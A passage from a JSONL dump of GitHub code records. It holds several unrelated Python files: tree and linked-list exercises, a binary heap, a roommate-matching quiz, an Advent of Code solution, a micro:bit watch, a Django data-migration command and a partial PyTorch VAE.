Otherwise, we can find the inorder successor by traversing through the\n# parent pointers, keeping track of the current node and parent. When we find a parent whose left child is equal to\n# node, then we know this is the inorder successor. Let's look at an example.\n#\n# 10\n# / \\\n# 5 30\n# / \\\n# 22 35\n# \\\n# 25\n# The inorder successor of 10 is 22 since it has a right child and 22 is the leftmost child of node.right.\n# The inorder successor of 25 is 30 since 30 is the first parent where parent.left is node.\nclass Node:\n def __init__(self, val, left=None, right=None, parent=None):\n self.val = val\n self.left = left\n self.right = right\n self.parent = parent\n\n\ndef inorder_successor(node):\n if node.right:\n return leftmost(node.right)\n\n parent = node.parent\n\n while parent and parent.left is not node:\n parent, node = parent.parent, parent\n\n return parent\n\n\ndef leftmost(node):\n while node.left:\n node = node.left\n return node\n","repo_name":"henrylin2008/Coding_Problems","sub_path":"DailyCoding/inorder_successor.py","file_name":"inorder_successor.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"62"} +{"seq_id":"43159276300","text":"import statistics\r\nimport numpy as np\r\nimport pandas as pd\r\nimport random\r\n\r\ndef initialize(data_base,user_name):\r\n #needed for loop cause of sth i changed ask me if you want\r\n for i in range(0,5):\r\n data_base[user_name].append(\"\")\r\n\r\n\r\n#Fuction to sign up\r\ndef signup(data_base,weights):\r\n user_name = input(\"Create username: \")\r\n if user_name in data_base.keys():\r\n while user_name in data_base.keys():\r\n a=input(\"This username is already registered, you want to log in? (yes/no) \")\r\n if a==\"yes\":\r\n login(data_base,weights)\r\n return user_name\r\n elif a==\"no\":\r\n signup(data_base,weights)\r\n return user_name\r\n else:\r\n data_base[user_name] = []\r\n weights[user_name] = []\r\n initialize(data_base,user_name)\r\n print(f\"{user_name} has been correctly created and logged in. Welcome to Room&Roomies!\\n\")\r\n return user_name\r\n\r\n#Fuction to log in \r\ndef login(data_base,weights):\r\n user_name = input(\"Username: \")\r\n if user_name not in data_base.keys():\r\n while user_name not in data_base.keys():\r\n a=input(\"This username is not registered, you want to sign up? (yes/no) \")\r\n if a==\"yes\":\r\n signup(data_base,weights)\r\n elif a==\"no\":\r\n login(data_base,weights)\r\n else:\r\n #data_base[user_name] = []\r\n #weights[user_name] = []\r\n print(f\"{user_name} has been correctly logged in. Welcome back to Room&Roomies!\\n\")\r\n return user_name\r\n\r\n#Fuction to assign the importance of each category\r\ndef categories(user_name,weights):\r\n questions=[\"Points awarded to your future roomate demographic characteristics: \",\"Points awarded to personality traits: \",\"Points awarded to schedules: \",\"Points awarded to house chores: \",\"Points awarded to forms of entertainment: \"]\r\n username_weights=[]\r\n while sum(username_weights) != 10:\r\n print(\"You are awarded with 10 points, which can be distributed between the following categories. \\nThe more points you award to a category, the most important we will consider it on your search. \\nFollowing these instructions, please distribute 10 points across the following categories using integers.\\n\")\r\n points_available=10\r\n points_awarded=0\r\n username_weights=[]\r\n\r\n for question in questions:\r\n if points_available!=0:\r\n points_awarded = input(f\"{question}\")\r\n if points_awarded == \"\":\r\n points_awarded=0\r\n points_awarded=int(points_awarded) \r\n points_remaining=points_available\r\n points_available-=points_awarded\r\n\r\n while points_available<0:\r\n print(\"You exceeded the number of points available\")\r\n print(f\"You have {points_remaining} points left\")\r\n points_awarded = int(input(f\"{question}\"))\r\n points_available=points_remaining-points_awarded\r\n \r\n username_weights.append(points_awarded)\r\n if points_available != 0:\r\n print(f\"You have {points_available} points left\")\r\n else:\r\n print(\"No points left!\")\r\n else:\r\n username_weights.append(0)\r\n print(f\"\\n{username_weights}\\n\")\r\n if sum(username_weights) != 10:\r\n print(\"You have to assign the 10 points, you can't leave any out!\\n\")\r\n\r\n weights[user_name] = username_weights\r\n weights\r\n return weights\r\n\r\n\r\n#Fuction to assign the importance of each question\r\ndef questions(weights,data_base,user_name):\r\n def enter(puntuation):\r\n if puntuation==\"\":\r\n puntuation=0\r\n return int(puntuation)\r\n\r\n print (\"Are you ready to find your perfect match? \\nLet us get to know you! \\n3, 2, 1, GOO!!\")\r\n print(\"Rate from 1 to 10 how much you relate to the each of the following sentences. 1 being you don't relate with it at all and 10 being I completely relate\")\r\n\r\n #Demograpics\r\n demographics = [\"I prefer to live with people of my same ethnicity\",\"I prefer to live with people with similar age as mine\", \"I prefer to live with people with my same gender\", \"I prefer to live people who is single\"]\r\n user_demographics = []\r\n if weights[user_name][0] != 0:\r\n for demography in demographics:\r\n puntuation = input(f\"{demography}: \")\r\n puntuation = enter(puntuation)\r\n while puntuation > 11 or puntuation < 1:\r\n puntuation = input(f\"Rate from 1 to 10. {demography}: \")\r\n puntuation = enter(puntuation)\r\n\r\n user_demographics.append(puntuation)\r\n data_base[user_name][0]=weights[user_name][0]*statistics.mean(user_demographics)/10\r\n\r\n else:\r\n data_base[user_name][0]=0\r\n \r\n print(\"\\n\")\r\n \r\n #Psychographics\r\n personality_traits = [\"I am social and extroverted\",\"I don't like to spend time alone\", \"I am a loud person\", \"I am very methodic and organized\", \"I care a lot about my grades\"]\r\n user_personality = []\r\n if weights[user_name][1] != 0:\r\n for personality in personality_traits:\r\n puntuation = input(f\"{personality}: \")\r\n puntuation = enter(puntuation)\r\n while puntuation > 11 or puntuation < 1:\r\n puntuation = input(f\"Rate from 1 to 10. {personality}: \")\r\n puntuation = enter(puntuation)\r\n user_personality.append(puntuation)\r\n data_base[user_name][1]=weights[user_name][1]*statistics.mean(user_personality)/10\r\n\r\n else:\r\n data_base[user_name][1]=0\r\n\r\n print(\"\\n\")\r\n\r\n #Schedules\r\n schedules = [\"I wake up between 6am and 8am\",\"I go to bed after 00:30am\", \"I shower in the mornings\", \"I have very strict and established eating schedules\"]\r\n user_schedules = []\r\n if weights[user_name][2] != 0:\r\n for schedule in schedules:\r\n puntuation = input(f\"{schedule}: \")\r\n puntuation = enter(puntuation)\r\n while puntuation > 11 or puntuation < 1:\r\n puntuation = input(f\"Rate from 1 to 10. {schedule}: \")\r\n puntuation = enter(puntuation)\r\n user_schedules.append(puntuation)\r\n\r\n data_base[user_name][2]=weights[user_name][2]*statistics.mean(user_schedules)/10\r\n\r\n else:\r\n data_base[user_name][2]=0\r\n\r\n print(\"\\n\")\r\n \r\n #House chores\r\n chores = [\"I leave the kitchen clean everytime I cook\",\"I clean my room once a week\", \"I like making sure the house is tidy\", \"I am willing to do chores in common areas once a week\"]\r\n user_chores = []\r\n if weights[user_name][3] != 0:\r\n for chore in chores:\r\n puntuation = input(f\"{chore}: \")\r\n puntuation = enter(puntuation)\r\n while puntuation > 11 or puntuation < 1:\r\n puntuation = input(f\"Rate from 1 to 10. {chore}: \")\r\n puntuation = enter(puntuation)\r\n user_chores.append(puntuation)\r\n \r\n data_base[user_name][3]= weights[user_name][3]*statistics.mean(user_chores)/10\r\n\r\n else:\r\n data_base[user_name][3]=0\r\n \r\n print(\"\\n\")\r\n\r\n #Entertainment\r\n entertainments = [\"I often go to clubs\",\"I enjoy arts in general, such as reading and painting\", \"I like to watch series and movies\",\"I like to spend my freetime out\", \"I am a sports person\", \"I often travel\"]\r\n user_entertainments = []\r\n if weights[user_name][4] != 0:\r\n for entertainment in entertainments:\r\n puntuation = input(f\"{entertainment}: \")\r\n puntuation = enter(puntuation)\r\n while puntuation > 11 or puntuation < 1:\r\n puntuation = input(f\"Rate from 1 to 10. {entertainment}: \")\r\n puntuation = enter(puntuation)\r\n user_entertainments.append(puntuation)\r\n\r\n data_base[user_name][4]= weights[user_name][4]*statistics.mean(user_entertainments)/10\r\n\r\n else:\r\n data_base[user_name][4]=0\r\n \r\n print(\"\\n\")\r\n\r\n print(data_base)\r\n return data_base\r\n\r\n\r\n\r\ndef matches(user_name,data_base):\r\n def numpy_euclidian_distance(point_1, point_2):\r\n array_1, array_2 = np.array(point_1), np.array(point_2)\r\n squared_distance = np.sum(np.square(array_1 - array_2))\r\n distance = np.sqrt(squared_distance)\r\n return distance \r\n\r\n df = pd.DataFrame(data_base)\r\n print(df)\r\n hasht={}\r\n\r\n for i in range(0,len(df.columns)):\r\n if df.columns.values[i] != user_name:\r\n distance = numpy_euclidian_distance(df.loc[:,user_name],df.iloc[:,i])\r\n value=100-distance*10\r\n hasht[df.columns.values[i]]=value\r\n dic=dict(sorted(hasht.items(),key=lambda x:x[1],reverse=True))\r\n for d in dic:\r\n print(f\"Affinity with {d}: {dic[d]:.0f}%\")\r\n return \r\n","repo_name":"antosistacp/Room-roomies","sub_path":"functions_one.py","file_name":"functions_one.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"26158543383","text":"class BinaryHeap:\n \"\"\"A heap implemented as an array-backed binary tree.\"\"\"\n def __init__(self, is_max = lambda x, y: x >= y):\n \"\"\"Initialize a heap.\n \n is_max(x, y) should return true if x == max(x, y). The default value will\n create a max-heap.\n \"\"\"\n self.is_max = is_max\n self.values = []\n\n def push(self, value):\n \"\"\"Adds an element to the heap.\"\"\"\n self.values.append(value)\n index = len(self.values) - 1\n # Bubble up the new value until the heap property is restored.\n while index > 0:\n parent = (index - 1) // 2\n # Stop if heap property satisfied.\n if self.is_max(self.values[parent], self.values[index]):\n break\n (self.values[index], self.values[parent]) = (self.values[parent], self.values[index])\n index = parent\n\n def pop(self):\n \"\"\"Remove and return the element at the top of the heap, or None if the\n heap is empty.\"\"\"\n # Swap the top of the heap with the last element. After removing the top\n # of the heap, end will be the new size of the heap.\n end = len(self.values) - 1\n if end < 0:\n return None\n elif end == 0:\n # Short-circuit on single-item heaps\n return self.values.pop()\n\n self.values[0], self.values[end] = self.values[end], self.values[0]\n result = self.values.pop()\n # Bubble down the new top of heap until the heap property is restored.\n index = 0\n # Note: The while condition will never be false\n while index < end:\n left, right = 2 * index + 1, 2 * index + 2\n # Find the index of the max child.\n right_max = right < end and self.is_max(self.values[right], self.values[left])\n max_index = right if right_max else left\n # Stop if heap property satisfied (including if now a leaf node).\n if max_index >= end or self.is_max(self.values[index], self.values[max_index]):\n break\n self.values[index], self.values[max_index] = self.values[max_index], self.values[index]\n index = max_index\n return result","repo_name":"tonygoold/python_practice","sub_path":"binary_heap.py","file_name":"binary_heap.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"2593371444","text":"'''\n\n\n\n'''\nimport h5py \nimport numpy as np \nfrom astropy.io import fits\nfrom astropy.table import Table\n# -- fomospec -- \nfrom . import util as UT \n\n\nclass LGal(object): \n ''' interface with LGal catalogs \n '''\n def __init__(self): \n self._dir_lgal = ''.join([UT.dat_dir(), 'Lgal/']) \n\n def GalInput(self, galid): \n ''' read in input star-formation and chemical enrichment histories\n '''\n f_input = ''.join([self._dir_lgal, 'gal_inputs/', \n 'gal_input_' + str(galid) + '_BGS_template_FSPS_uvmiles.csv']) \n gal_input = Table.read(f_input, delimiter=' ')\n return gal_input\n\n def Spectra(self, galid, type='source', lib='bc03'): \n ''' Read in spectra given galid\n '''\n # source spectra file with meta data \n f_source = fits.open(self._Fspec(galid, 'source', lib)) \n \n # get meta data of spectra \n hdr = f_source[0].header\n meta = {}\n for k in hdr.keys(): \n meta[k] = hdr[k]\n\n spec = {} \n if type == 'source': \n # source spectra \n specin = f_source[1].data\n spec['wave'] = specin['wave']\n spec['flux'] = specin['flux_nodust_nonoise'] * 1e20\n spec['flux_unc'] = None \n\n elif type == 'desibgs': \n # desi-like spectra (in desiIO format) \n import desispec.io as desiIO\n f_desi = self._Fspec(galid, type, lib)#''.join([self._dir_lgal, 'spectra/', 'desi_out_', f_spec])\n spec_desi = desiIO.read_spectra(f_desi)\n\n spec['wave'] = np.concatenate([spec_desi.wave[b] for b in ['b', 'r', 'z']])\n spec['flux'] = np.concatenate([spec_desi.flux[b][0] for b in ['b', 'r', 'z']]) # 10-17 ergs/s/cm2/AA\n spec['flux_unc'] = np.concatenate([spec_desi.ivar[b][0]**-0.5 for b in ['b', 'r', 'z']])\n \n return spec, meta\n \n def SpecFit(self, galid, type='source', lib='bc03', fit='firefly', **fitkwargs): \n ''' Read in output files from different spectral fitters\n '''\n if fit == 'firefly': \n if 'dust' not in fitkwargs.keys(): \n raise ValueError(\"specify `dust` kwarg\") \n elif 'prospector' in fit:\n if 'masked' not in fitkwargs.keys(): \n raise ValueError(\"specify whether masked\") \n else: \n raise NotImplementedError \n\n f_spec = self._Fspec(galid, type, lib)\n if fit == 'firefly': \n return self._readFirefly(f_spec, dust=fitkwargs['dust']) \n elif fit == 'prospector_mcmc': \n return self._readProspector(f_spec, masked=fitkwargs['masked'], infer='mcmc') \n else: \n raise NotImplementedError \n\n def _readProspector(self, f_spec, masked=True, infer='mcmc'): \n ''' read in prospector output file and return MCMC chain \n and posterior. \n '''\n f_spec = '.'.join(f_spec.split('/')[-1].split('.')[:-1])+'.h5'\n \n if infer == 'mcmc': \n f_mc = ''.join([self._dir_lgal, 'spectra/',\n 'prospector.emcee.masked.', f_spec]) \n ef = h5py.File(f_mc, 'r')\n chain = ef['sampling']['chain'].value\n lnp = ef['sampling']['lnprobability'].value\n ef.close()\n return chain,lnp \n\n def _readFirefly(self, f_spec, dust='hpf_only'): \n ''' read in FireFly output file \n '''\n\n f_spec = '.'.join(f_spec.split('/')[-1].split('.')[:-1])+'.hdf5'\n\n f_ffly = ''.join([self._dir_lgal, 'spectra/',\n 'firefly.m11.MILES.imf_cha.dust_', dust, '.', f_spec]) \n f = h5py.File(f_ffly, 'r')\n \n output = {} \n for g in f.keys(): \n if g != 'properties': \n output[g] = f[g].value\n \n props = {} \n for k in f['properties'].keys(): \n props[k] = f['properties'][k].value\n return output, props\n\n def _Fspec(self, galid, type, lib): \n ''' spectra file\n '''\n if lib == 'bc03': \n str_lib = 'BC03_Stelib'\n else: \n raise NotImplementedError\n f_spec = ''.join(['gal_spectrum_', str(galid), '_BGS_template_', str_lib, '.fits']) \n f_source = ''.join([self._dir_lgal, 'templates/', f_spec])\n\n if type == 'source': \n return f_source \n elif type == 'desibgs': \n return ''.join([self._dir_lgal, 'spectra/', 'desi_out_', f_spec])\n\n\n'''\nother catalogs here\n'''\n","repo_name":"changhoonhahn/FOMOspec","sub_path":"fomospec/catalog.py","file_name":"catalog.py","file_ext":"py","file_size_in_byte":4512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"3816006034","text":"class Cucumber():\n def __init__(self, char):\n self.direction = char\n self.can_move = False\n\n def set_direction(self, direction):\n self.direction = direction\n\n def get_direction(self):\n return self.direction\n\n def set_can_move(self, yes_or_no):\n self.can_move = yes_or_no\n\n def it_can_move(self):\n return self.can_move\n\ninput_file = open('input.txt', 'r')\nall_lines = input_file.readlines()\n\n# with open(\"test.txt\") as f:\n# field = [[Cucumber(x) for x in row.strip('\\n')] for row in f]\n\nfield = []\nfor line in all_lines:\n l = []\n res = line.strip('\\n')\n for char in res:\n l.append(Cucumber(char))\n field.append(l)\n\n# print(str(len(field)))\n# print(str(len(field[0])))\nmove_counter = 0\nfor step in range(1, 1000):\n\n # Check EAST\n for i in range(len(field)):\n for j in range(len(field[i])):\n if (j + 1) == len(field[i]):\n if field[i][j].get_direction() == '>' and field[i][0].get_direction() == '.':\n field[i][j].set_can_move(True)\n elif field[i][j].get_direction() == '>' and field[i][j + 1].get_direction() == '.':\n field[i][j].set_can_move(True)\n\n # Move EAST\n for i in range(len(field)):\n for j in range(len(field[i])):\n if field[i][j].it_can_move():\n if (j + 1) == len(field[i]):\n field[i][0].set_direction('>')\n field[i][j].set_direction('.')\n field[i][j].set_can_move(False)\n move_counter = move_counter + 1\n else:\n field[i][j + 1].set_direction('>')\n field[i][j].set_direction('.')\n field[i][j].set_can_move(False)\n move_counter = move_counter + 1\n\n # Check SOUTH\n for i in range(len(field)):\n for j in range(len(field[i])):\n if (i + 1) == len(field):\n if field[i][j].get_direction() == 'v' and field[0][j].get_direction() == '.':\n field[i][j].set_can_move(True)\n elif field[i][j].get_direction() == 'v' and field[i + 1][j].get_direction() == '.':\n field[i][j].set_can_move(True)\n\n # Move SOUTH\n for i in range(len(field)):\n for j in range(len(field[i])):\n if field[i][j].get_direction() == 'v' and field[i][j].it_can_move():\n if (i + 1) == len(field):\n field[0][j].set_direction('v')\n field[i][j].set_direction('.')\n field[i][j].set_can_move(False)\n move_counter = move_counter + 1\n else:\n field[i + 1][j].set_direction('v')\n field[i][j].set_direction('.')\n field[i][j].set_can_move(False)\n move_counter = move_counter + 1\n\n\n print('Step: ' + str(step))\n print('Counter: ' + str(move_counter))\n if move_counter == 0:\n print(str(step))\n break\n else: # next round\n move_counter = 0\n for i in range(len(field)):\n for j in range(len(field[i])):\n if field[i][j].it_can_move():\n raise('ERROR: resetting can_move_failed!')","repo_name":"Tamalera/AdventOfCode2021","sub_path":"Day25/seaCucumberField.py","file_name":"seaCucumberField.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"15083555147","text":"######################################################\n# A watch (as in a small clock for your wrist or pocket)\n# \n# Button A sets the mode: Clock or Setting time\n# Button B \n# in clock mode: shows the time as a scrolling display \n# in setting mode: increments the time\n# \n# The LED array displays the clock time in the format hh:mm. \n# The digits of the time are represented by columns of LEDs.\n# \n# The digits 1 - 5 are represented by more LEDs being lit from \n# the bottom up.\n# \n# For instance the digit 3 would look like:\n# \n# .\n# .\n# X\n# X\n# X\n# \n# \n# The digits 6 - 9 are represented by LEDs being turned off from\n# the bottom up. The digit 6 would look like:\n# \n# X\n# X\n# X\n# X\n# .\n# \n# The centre column is a colon flashing once a second to separate hours from minutes.\n# \n# The time 17:49 would look like:\n# \n# . X . . X\n# . X . X .\n# . X . X .\n# . . . X .\n# X . . X .\n# \n# \n######################################################\n\nfrom microbit import *\n\n# Tweak CLOCK_ADJUST to make your system clock more accurate.\n# My clock is too fast by 4 seconds every minute so I use 4/60.\n# If your clock is too slow by 3 seconds every minute use -3/60.\nCLOCK_ADJUST = 4/60 \n\nlast_button_a_state = False\nlast_button_b_state = False\nlast_display_time = 0\nbase_time = 0\nmode = 0\n\nmodes = {0:\"clock\", 1:\"set h\", 2:\"mx10\", 3:\"m\"}\n\n\ndef decode_time(milliseconds):\n \"\"\"Converts a time in milliseconds into a string with hours:minutes,\"\"\"\n mins = int(milliseconds / (1000 * 60) % 60)\n hrs = int(milliseconds / (1000 * 60 * 60) % 24)\n return \"{h:0>2}:{m:0>2}\".format(h=hrs, m=mins)\n\n\ndef show_time(time):\n time_string = decode_time(time)\n\n for i in range(5):\n if time_string[i].isdigit():\n d = int(time_string[i])\n plot_LED_column(i, d)\n\n show_colon(mode==0 and int((time / 1000) % 2))\n\n\ndef show_colon(visible):\n display.set_pixel(2, 1, visible*9)\n display.set_pixel(2, 3, visible*9)\n\n\ndef get_clock_time():\n global base_time\n sys_time = running_time() / (1 + CLOCK_ADJUST)\n time = (sys_time - base_time) % (24 * 60 * 60 * 1000)\n base_time = sys_time - time \n return time\n\n\ndef plot_LED_column(column, number):\n \"\"\"plots a column of LEDs to represent a number from 0 - 9\"\"\"\n if number > 9:\n number = 9\n\n if number <= 5:\n for i in range(4, -1, -1):\n if i < 5 - number:\n display.set_pixel(column, i, 0)\n else:\n display.set_pixel(column, i, 9)\n\n if number > 5:\n for i in range(4, -1, -1):\n if i < 5 - (number - 5):\n display.set_pixel(column, i, 9)\n else:\n display.set_pixel(column, i, 0)\n\n\nwhile True:\n # detect a change in button A's state, the Mode button\n button_a_state = button_a.is_pressed()\n if button_a_state != last_button_a_state:\n last_button_a_state = button_a_state\n\n #increment the mode\n if button_a_state == True:\n mode = (mode + 1) % 4\n display.scroll(modes[mode])\n show_time(get_clock_time())\n\n # detect a change in button B's state, the increment / select button\n button_b_state = button_b.is_pressed()\n if button_b_state != last_button_b_state:\n last_button_b_state = button_b_state\n\n if button_b_state == True:\n # button B's action depends on the current mode\n if mode == 0: #show time\n display.scroll(decode_time(get_clock_time()))\n elif mode == 1: #setting time: increment hour units\n base_time = base_time - (60 * 60 * 1000)\n elif mode == 2: #setting time: increment minute tens\n base_time = base_time - (10 * 60 * 1000)\n elif mode == 3: #setting time: increment minute units\n base_time = base_time - (60 * 1000)\n\n show_time(get_clock_time())\n \n\n #If in clock mode update the display every second\n if mode == 0:\n display_time = running_time() - last_display_time\n if display_time >= 1000:\n last_display_time = display_time\n show_time(get_clock_time())\n\n sleep(100)\n","repo_name":"bbcmicrobit/micropython","sub_path":"examples/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":580,"dataset":"github-code","pt":"62"} +{"seq_id":"74277018437","text":"from django.core.management import BaseCommand\n\nfrom sme_terceirizadas.dados_comuns.models import LogSolicitacoesUsuario\nfrom sme_terceirizadas.produto.models import HomologacaoProduto, Produto, ProdutoEdital\n\n\nclass Command(BaseCommand):\n help = 'Cria objetos DataHoraVinculoProdutoEdital para todos os produtos'\n\n def handle(self, *args, **options):\n self.stdout.write(self.style.SUCCESS(f'Iniciando processo de criação dos dados'))\n produtos = Produto.objects.filter(vinculos__isnull=False).distinct()\n self.stdout.write(\n self.style.SUCCESS(f'Criando objetos DataHora de {produtos.count()} produtos simples...'))\n self.cria_datas_horas_dos_vinculos_do_produto(produtos)\n self.stdout.write(self.style.SUCCESS(f'DataHora de {produtos.count()} produtos simples finalizado.'))\n self.stdout.write(self.style.SUCCESS('Verificando quantidade de produtos complexos...'))\n hom_produtos_complexos_uuids = self.produtos_complexos()\n self.stdout.write(\n self.style.SUCCESS(f'Criando objetos DataHora de '\n f'{len(hom_produtos_complexos_uuids)} produtos complexos...'))\n self.lida_com_produtos_complexos(hom_produtos_complexos_uuids)\n self.stdout.write(self.style.SUCCESS(f'DataHora de {len(hom_produtos_complexos_uuids)} '\n f'produtos complexos finalizado.'))\n uuids_suspensos_editais = LogSolicitacoesUsuario.objects.filter(\n status_evento=LogSolicitacoesUsuario.SUSPENSO_EM_ALGUNS_EDITAIS).values_list('uuid_original', flat=True)\n self.stdout.write(\n self.style.SUCCESS(f'Criando objetos DataHora de '\n f'{len(uuids_suspensos_editais)} produtos com log de editais suspensos...'))\n self.lida_com_log_editais_suspensos(uuids_suspensos_editais)\n self.stdout.write(self.style.SUCCESS(f'DataHora de {len(uuids_suspensos_editais)} produtos finalizado.'))\n self.stdout.write(self.style.SUCCESS(f'Finalizando processo de migracao de dados'))\n\n def cria_datas_horas_dos_vinculos_do_produto(self, produtos):\n for index, produto in enumerate(produtos):\n for produto_edital in produto.vinculos.all():\n data_hora = produto_edital.criar_data_hora_vinculo()\n data_hora.criado_em = produto_edital.criado_em\n data_hora.save()\n if produto_edital.edital.numero == 'Edital de Pregão n°78/SME/2016':\n data_hora.criado_em = produto_edital.produto.data_homologacao\n data_hora.save()\n if index % 100 == 0 and index:\n self.stdout.write(\n self.style.SUCCESS(f'Já foram {index}...'))\n\n def produtos_complexos(self):\n produtos = Produto.objects.filter(vinculos__isnull=False).distinct()\n prods_log_editais = []\n for produto in produtos:\n hom = produto.homologacao\n for log in hom.logs.all():\n if ('suspen' in log.get_status_evento_display() or\n 'não homol' in log.get_status_evento_display() or\n 'autorizou reclamação' in log.get_status_evento_display()):\n prods_log_editais.append(hom.uuid)\n continue\n return prods_log_editais\n\n def lida_com_produtos_complexos(self, hom_produtos_complexos_uuids):\n hom_produtos = HomologacaoProduto.objects.filter(uuid__in=hom_produtos_complexos_uuids)\n for hom_produto in hom_produtos:\n for log in hom_produto.logs.all():\n if log.status_evento in [\n LogSolicitacoesUsuario.CODAE_AUTORIZOU_RECLAMACAO,\n LogSolicitacoesUsuario.CODAE_NAO_HOMOLOGADO,\n LogSolicitacoesUsuario.CODAE_AUTORIZOU_RECLAMACAO,\n LogSolicitacoesUsuario.CODAE_SUSPENDEU\n ]:\n for produto_edital in hom_produto.produto.vinculos.all():\n data_hora_vinculo = produto_edital.criar_data_hora_vinculo(suspenso=True)\n data_hora_vinculo.criado_em = log.criado_em\n data_hora_vinculo.save()\n\n def lida_com_log_editais_suspensos(self, uuids_suspensos_editais):\n hom_produtos = HomologacaoProduto.objects.filter(uuid__in=uuids_suspensos_editais)\n for hom_produto in hom_produtos:\n for log in hom_produto.logs.all():\n if log.get_status_evento_display() == 'Suspenso em alguns editais':\n editais = log.justificativa.split('

Editais suspensos:

')[1][3:-4].split(', ')\n for edital in editais:\n produto_edital = ProdutoEdital.objects.get(produto=hom_produto.produto, edital__numero=edital)\n dh = produto_edital.criar_data_hora_vinculo(suspenso=True)\n dh.criado_em = log.criado_em\n dh.save()\n","repo_name":"prefeiturasp/SME-Terceirizadas","sub_path":"sme_terceirizadas/produto/management/commands/criar_datas_horas_produtos_editais.py","file_name":"criar_datas_horas_produtos_editais.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"pt","doc_type":"code","stars":7,"dataset":"github-code","pt":"62"} +{"seq_id":"28427598739","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:\n if left == right:\n return head\n st = None\n ed = None\n prev = None\n temp = head\n nxt = temp.next\n if not nxt:\n return head\n c = 1\n while c < right:\n if c < left:\n ed = temp\n temp = temp.next\n nxt = nxt.next\n else:\n if not st:\n st = temp\n temp.next = prev\n prev = temp\n temp = nxt\n nxt = nxt.next\n c += 1\n temp.next = prev\n st.next = nxt\n if ed:\n ed.next = temp\n else:\n return temp\n return head","repo_name":"specbug/competitive-programming","sub_path":"LeetCode/reverse-linked-list-ii.py","file_name":"reverse-linked-list-ii.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"31284763573","text":"import pytorch_lightning as pl\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchmetrics.functional as tmf\nfrom pytorch_lightning.callbacks import EarlyStopping\nfrom torch.utils.data import DataLoader\n\nfrom utils.tensors import split\nfrom vae.dataset import UserRatingsDataset\n\nDEFAULT_PATH = \"vae/vae.pt\"\n\n\ndef init_weights(m):\n if type(m) == nn.Linear:\n nn.init.xavier_normal_(m.weight)\n nn.init.normal_(m.bias, std=0.01)\n\n\ndef elbo(x_hat, x, mu, logvar, anneal=1.0):\n bce = -torch.mean(torch.sum(F.log_softmax(x_hat, 1) * x, -1))\n kld = -5e-1 * torch.mean(torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), dim=1))\n\n return bce + anneal * kld\n\n\nclass Encoder(nn.Module):\n def __init__(self, input_size, output_size, layers=[1024, 512, 512, 256]):\n super(Encoder, self).__init__()\n self.deepNN = nn.Sequential()\n i = 0\n for layer in layers:\n self.deepNN.add_module(\n f\"ff{i}\", nn.Linear(input_size, layer, dtype=torch.float32)\n )\n self.deepNN.add_module(f\"activation{i}\", nn.Tanh())\n input_size = layer\n i += 1\n\n self.mu = nn.Linear(layer, output_size, dtype=torch.float32)\n self.sigma = nn.Linear(layer, output_size, dtype=torch.float32)\n\n def forward(self, inputs):\n tensor = self.deepNN(inputs)\n return self.mu(tensor), self.sigma(tensor)\n\n @property\n def trainable_parameters(self):\n total_params = sum(p.numel() for p in self.parameters())\n return total_params\n\n\nclass Decoder(nn.Module):\n def __init__(self, input_size, output_size, layers=[1024, 512, 512, 256]):\n super(Decoder, self).__init__()\n self.deepNN = nn.Sequential()\n\n i = 0\n for layer in layers:\n self.deepNN.add_module(\n f\"ff{i}\", nn.Linear(input_size, layer, dtype=torch.float32)\n )\n self.deepNN.add_module(f\"activation{i}\", nn.Tanh())\n input_size = layer\n i += 1\n\n self.deepNN.add_module(\n \"output\", nn.Linear(layer, output_size, dtype=torch.float32)\n )\n # self.deepNN.add_module(\"final_activation\", nn.Sigmoid())\n\n def forward(self, inputs):\n tensor = self.deepNN(inputs)\n return tensor\n\n @property\n def trainable_parameters(self):\n total_params = sum(p.numel() for p in self.parameters())\n return total_params\n\n\nclass Model(pl.LightningModule):\n def __init__(\n self,\n input_size,\n latent_size,\n encoder_layers=[600],\n decoder_layers=[600],\n ):\n super(Model, self).__init__()\n\n self.drop = nn.Dropout()\n self.encoder = Encoder(input_size, latent_size, encoder_layers)\n self.decoder = Decoder(latent_size, input_size, decoder_layers)\n\n self.apply(init_weights)\n\n def reparametrize(self, mu, logvar):\n sigma = torch.exp(0.5 * logvar)\n eps = torch.randn_like(mu)\n return eps.mul(sigma).add_(mu)\n\n def forward(self, x):\n x = x.to_dense()\n mu, _ = self.encoder(x)\n tensor = self.decoder(mu)\n return tensor\n\n def training_step(self, batch, batch_idx):\n batch = batch.to_dense()\n batch = self.drop(batch)\n mu, logvar = self.encoder(batch)\n tensor = self.reparametrize(mu, logvar)\n tensor = self.decoder(tensor)\n # TODO: implement annealing\n loss = elbo(tensor, batch, mu, logvar)\n return loss\n\n def validation_step(self, batch, batch_idx):\n batch = batch.to_dense()\n input, hold = split(batch)\n tensor = self.forward(input)\n tensor[input > 0] = 0.0\n # TODO: implement following validation metrics:\n # * recall and precision\n # * arhr and hr\n metrics = {}\n metrics[\"ndcg@100\"] = tmf.retrieval_normalized_dcg(tensor, hold, 100)\n metrics[\"hr@1\"] = tmf.retrieval_hit_rate(tensor, hold, 1)\n metrics[\"hr@10\"] = tmf.retrieval_hit_rate(tensor, hold, 10)\n self.log_dict(metrics, on_epoch=True, prog_bar=True)\n return metrics\n\n def test_step(self, batch, batch_idx):\n batch = batch.to_dense()\n input, hold = split(batch)\n tensor = self.forward(input)\n tensor[input > 0] = 0.0\n # TODO: implement following validation metrics:\n # * recall and precision\n # * 